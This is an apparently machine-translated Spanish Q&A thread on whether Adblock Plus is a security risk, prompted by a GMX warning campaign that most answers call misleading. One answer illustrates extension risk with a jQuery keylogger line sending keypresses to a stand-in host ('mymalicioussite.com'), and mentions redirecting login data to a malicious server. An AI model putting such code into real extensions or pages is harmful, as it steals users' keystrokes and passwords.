No lo es. Este es un FUD ( miedo, incertidumbre y duda ) campaña de GMX porque quieren mostrar sus anuncios. No existe ningún riesgo de seguridad por parte de los bloqueadores de anuncios mencionados. Agregaron algunos crapware a la lista para que se vea más legítimo.

Por supuesto, estas campañas son muy inusuales, especialmente de una empresa tan grande y conocida como GMX. Desafortunadamente, no tengo una fuente en inglés a mano (porque es una campaña solo para alemanes) pero como habla alemán, puede leer este artículo en heise.de .

Actualización # 1: United Internet, la compañía detrás de GMX, recibió muchas críticas por engañar a los clientes al afirmar falsamente que existe un riesgo de seguridad en su PC. El Wall Street Journal (edición alemana) nombrado Las advertencias que se muestran en GMX y el sitio que vinculan a una "campaña de miedo".

Actualización # 2: GMX ahora dice que ya no mostrarán el enlace cuando uses bloqueadores de anuncios, pero que aún lo mostrarán si usas crapware que inyecta anuncios, la lista en el sitio http://www.browsersicherheit.info/ se actualizó en consecuencia y ahora Enumera sólo una pequeña colección de crapware. Esta lista de ninguna manera está completa, por lo que no es una fuente confiable cuando quiere saber si su navegador tiene instalado crapware. Sin embargo, United Internet aún mantiene su posición de que no quieren que los usuarios que visitan sus sitios utilicen bloqueadores de anuncios y dijeron que desarrollarán otros métodos antibloqueo en el futuro ( fuente del alemán ).

Actualizar

Después de pensarlo, estoy de acuerdo con las otras respuestas en que, a pesar de que PUEDE acceder a sus datos, Adblock tiene más probabilidades de proteger su privacidad que de invadirla. Lo real riesgo son los anuncios maliciosos que le piden que instale software en su computadora. Adblock previene estos.

A continuación se encuentra la respuesta original de advertencia:

Sí, es totalmente.

Adblock Plus es una extensión / complemento del navegador desarrollado por un desarrollador independiente. Adblock puede acceder al DOM (modelo de objeto de documento) en todas las páginas.

La forma en que funciona AdBlock es que inyecta el script en su navegador, que busca en el DOM y luego ejecuta una función hide() en lo que determina que son los anuncios.

Eso significa que AdBlock (y cualquier extensión de Chrome con ese permiso) puede acceder a tu DOM. Adblock no puede acceder a las variables de JavaScript.

¿Qué significa esto?

Si estás en un sitio web con autenticación segura, y hay un objeto JavaScript con algo privado como un AuthKey, estás seguro . AdBlock no puede acceder a las variables de JavaScript.

Sin embargo, AdBlock PUEDE ejecutar un código equivalente a este.

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

Lo que esencialmente enrutará las teclas que presiona a un servidor remoto.

Esto puede usarse para robar tu contraseña, que es incluso peor que robar tu token.

Dicho esto, ¿es AdBlock peligroso?

Me parece que AdBlock no es demasiado peligroso ya que el desarrollador se ha identificado y es usado por millones de personas. Si estuviera haciendo el tipo de trampa que se mencionó anteriormente, es probable que alguien se haya dado cuenta y haya hecho sonar el silbato.

Pero no creas que las extensiones de Chrome son totalmente seguras. Todos ellos pueden robar cualquier información, así como otras cosas maliciosas.

¿Qué más se puede hacer?

Una extensión de Chrome también puede realizar las siguientes violaciones de seguridad de forma bastante trivial ...

• Dirija el contenido de cualquier correo electrónico o página que lea a una fuente de terceros (si este correo electrónico contiene información de inicio de sesión no cifrada, está bloqueado) Si puede verlo en la pantalla, también puede hacerlo cualquier Extensión de Chrome, sin preguntas. .
• Ingrese información en un campo y presione el botón enviar, por ejemplo, envíe un correo electrónico
• Si deja su navegador abierto y la extensión sabe cómo, puede usar su interfaz de correo electrónico (Gmail, Outlook) para enviar correos electrónicos de su elección a sus contactos. Esto es trivial.
• Cambie la secuencia de comandos asociada con cualquier botón, si se colocó originalmente con jQuery. Por ejemplo, el botón que envía su información de inicio de sesión al servidor se puede cambiar ligeramente para enviar esa información tanto al servidor como a http://mymaliciousserver . Esto es trivial.

Actualizar

Se ha verificado a través de la discusión que AdBlock es de código abierto. Esto debería permitirle confiar más en AdBlock, pero recuerde que todavía es capaz de hacer esas cosas. He revisado la fuente y puedo decir con seguridad que no tengo idea de lo que está pasando.

Fuente: soy un desarrollador de JavaScript y Chrome Extension.

Esto realmente se reduce a una cuestión de confianza. Es cierto que hoy en día, la extensión AdBlock es segura. Sabemos que no robará sus datos, aunque, como señalan las otras respuestas , tiene la capacidad técnica. capacidad para hacerlo.

Sin embargo, las extensiones de Chrome se actualizan de forma silenciosa y automática.

¿Confía en que el desarrollador de la extensión AdBlock no agregará código malicioso? Personalmente, con millones de usuarios, el código malicioso se detectaría rápidamente y, sin duda, sería un asesino profesional para el desarrollador.

Incluso si confía en el desarrollador, todavía hay escenarios improbables que podrían exponerlo:

• La cuenta de Chrome Store del desarrollador podría ser hackeada y el atacante podría lanzar una actualización maliciosa.
• El desarrollador podría vender la extensión a una parte menos escrupulosa .
• Alguien podría alentar a al desarrollador a que introduzca un código malicioso.

Para los paranoicos, estos problemas podrían mitigarse con:

• Solo inicie sesión en sitios confidenciales (es decir, bancarios) usando el modo de incógnito (donde las extensiones están deshabilitadas de forma predeterminada).
• Deshabilitando las actualizaciones automáticas de la extensión , pero obviamente pierde mucha comodidad.

Entonces, si bien es intelectualmente deshonesto decir "no, no hay riesgo", GMX exagera completamente el riesgo. Al igual que confío en que Google me proporcione un navegador que no robe mis datos personales, confío en que el desarrollador de AdBlock me proporcione una extensión que no robe mis datos.

El riesgo de que la extensión se actualice con código malicioso es lo suficientemente pequeño para que no me preocupe, y si tengo la menor preocupación, es bastante fácil deshabilitar la extensión.

Todo software es un riesgo de seguridad, pero en este caso su reclamación es engañosa.

Al igual que todos los consejos son potencialmente malos y todas las transacciones son potencialmente fraudulentas. "Riesgo" significa que su seguridad no está garantizada, y es cierto en el 100% de los casos.

Pero en el caso de AdBlock Plus, el software es bien comprendido y desarrollado por un equipo que tiene un historial de protección de los intereses de sus usuarios. Además, es de código abierto, por lo que el código fuente está disponible para que usted se examine por cualquier problema de seguridad. Entonces, en este caso, el riesgo es mínimo; incluso trivial.

En cambio, GMX está utilizando un truismo ("el software siempre es arriesgado") para sugerir que el software este es peligroso, lo que es engañoso en el mejor de los casos, y posiblemente difamatorio. Es como un propietario de restaurante que distribuye folletos que dicen que sus competidores podrían envenenar su propia comida. Técnicamente es cierto, ya que usted dijo "podría ser" en lugar de "son", pero la acción es fundamentalmente deshonesta.

Solo una observación: tiendo a promocionar los bloqueadores de anuncios, especialmente para mis amigos y asociados menos expertos, precisamente porque reduce las amenazas de seguridad. ¿Cómo? Debido a que gran parte del contenido más malicioso en la web viene en forma de un anuncio engañoso como "haga clic aquí para hacer que su PC sea más rápida" ... Estos desaparecen en gran medida con un bloqueador de anuncios.

Adblock (como otras extensiones y, para el caso, desarrolladores de navegadores) tiene la capacidad técnica de obtener una gran cantidad de sus datos, y usted tiene todos los riesgos comúnmente asociados con la ejecución de aplicaciones de terceros, es decir, que el proveedor puede ser malicioso, y puede haber errores en su software que rompan su seguridad.

Dicho esto, consideraría AdBlock como una defensa contra el phishing. Una gran cantidad de software cuestionable se transmite a los usuarios a través de anuncios enmascarados como otra cosa, es decir, un sitio ofrece algún elemento que un el usuario desea, pero tiene un anuncio que se parece a un botón de descarga y entrega un producto de adware / malware en lugar del contenido real en el sitio, y dicho malware descargado accidentalmente es un grave riesgo de seguridad. Del mismo modo, ha habido incidentes de ataques masivos de consumidores al ejecutar un anuncio publicitario que contiene un exploit zeroday, lo que haría que el exploit apareciera en sitios respetados y de confianza.

Para las prácticas de seguridad de toda la compañía, puede tener sentido requerir AdBlock e instalarlo de forma predeterminada en cada estación de trabajo, ya que es especialmente útil para proteger a los usuarios inexpertos que no lo instalarían por sí mismos. Esto causaría un riesgo al confiar en un producto de software más, pero sería un resultado positivo para la seguridad diaria.

La manera en que United Internet difunde esta información es engañosa (me estoy esforzando por evitar decir "difamación"). La alegación actual es claramente errónea por todos los medios objetivos y la presentación es difamatoria.

Por supuesto, en principio, uno tiene que admitir que Adblock (Plus) es, por supuesto, un riesgo de seguridad potencial . Si este riesgo justifica una preocupación razonable es otra cosa.

Adblock (Plus) podría ser un riesgo de seguridad por tres razones:

1. Es un software que se ejecuta en su computadora, que podría , como todo software, en principio hace casi cualquier cosa. Incluyendo mostrar información falsa o robar sus datos.
2. sí modifica el contenido de la página web, de eso se trata el bloqueo de anuncios. Ciertamente, un software que es conocido para modificar los contenidos de las páginas web podría modificar los contenidos de forma maliciosa y pasar desapercibido mucho más fácilmente que otro software.
3. Realiza esta tarea haciendo coincidir una lista descargable de expresiones regulares de un rango de terceros (no controlados / desconocidos), como EasyList

Por lo tanto, si está en modo ultraparanoico, puede temer que alguien de EasyList (u otro proveedor de listas de filtros) modifique la lista de filtros para que haga algo malicioso, o que un pirata informático secuestre el sitio. Presumiblemente, su complemento Adblock Plus descargaría la lista maliciosa durante su actualización diaria / semanal sin saberlo y sin un medio de verificación (existe una suma de comprobación que se puede incrustar, pero esto solo protege de daños accidentales, no de modificaciones maliciosas). Como resultado, tal lista de bloqueo maliciosa podría en teoría hacer que el complemento haga "cosas malas".

Afortunadamente, aparte de las vulnerabilidades de JS, no hay mucho daño que se pueda hacer de manera realista a través de este vector de ataque debido a la forma en que funciona Adblock (coincidirá con una expresión regular arbitraria, pero No haré sustituciones arbitrarias, por lo que esconder algunos elementos que no deberían ocultar o dejar pasar algunos anuncios es el peor de los casos posibles. Por otro lado, un exploit JS podría usarse contra usted sin que Adblock Plus se ejecute en primer lugar.

También, obviamente, como cualquier software de terceros (incluido Firefox o Chrome), el complemento Adblock Plus podría robarle sus datos. Todo lo que puede decir en este momento es que hasta ahora esto no ha sucedido .
Por otra parte, casi todos los grandes jugadores comerciales en el negocio están haciendo cosas poco confiables en una base diaria, con lo que nadie se opone.

Ahora debe preguntarse qué tan probable es que Adblock Plus de hecho robe los datos del usuario, y qué tan probable es que tal cosa no se detecte durante más de un día o dos en una Proyecto de código abierto ampliamente desplegado.

Francamente, si cree que esta es una amenaza seria y realista que probablemente le afectará, entonces también debe creer que Microsoft en colaboración con la NSA ya incorpora la funcionalidad de robo de identidad en Windows y que todas las computadoras tienen un "interruptor de apagado" secreto que el DoD de EE. UU. Puede activar a voluntad (eso también es en principio posible, y en realidad es más probable que sea Es cierto que el autor de Adblock que le robó sus ahorros).

Tampoco debe confiar en GMX en este caso, ya que lo harán (tenga en cuenta la redacción, lo hará , no puede ) compartir todos sus los datos personales y la información de tráfico de forma maliciosa y poco ética con otras partes (al menos con las agencias de EE. UU., debido al tratado de Schröder de 2001, pero no tiene forma de saber con quién más). Tampoco debe confiar en 1 & 1 (otro miembro de United Internet) porque compartirá sus datos personales con quién-sabe-quién (siendo una empresa con sede en los EE. UU.). Ni Google, ni la otra mitad de Internet, para el caso.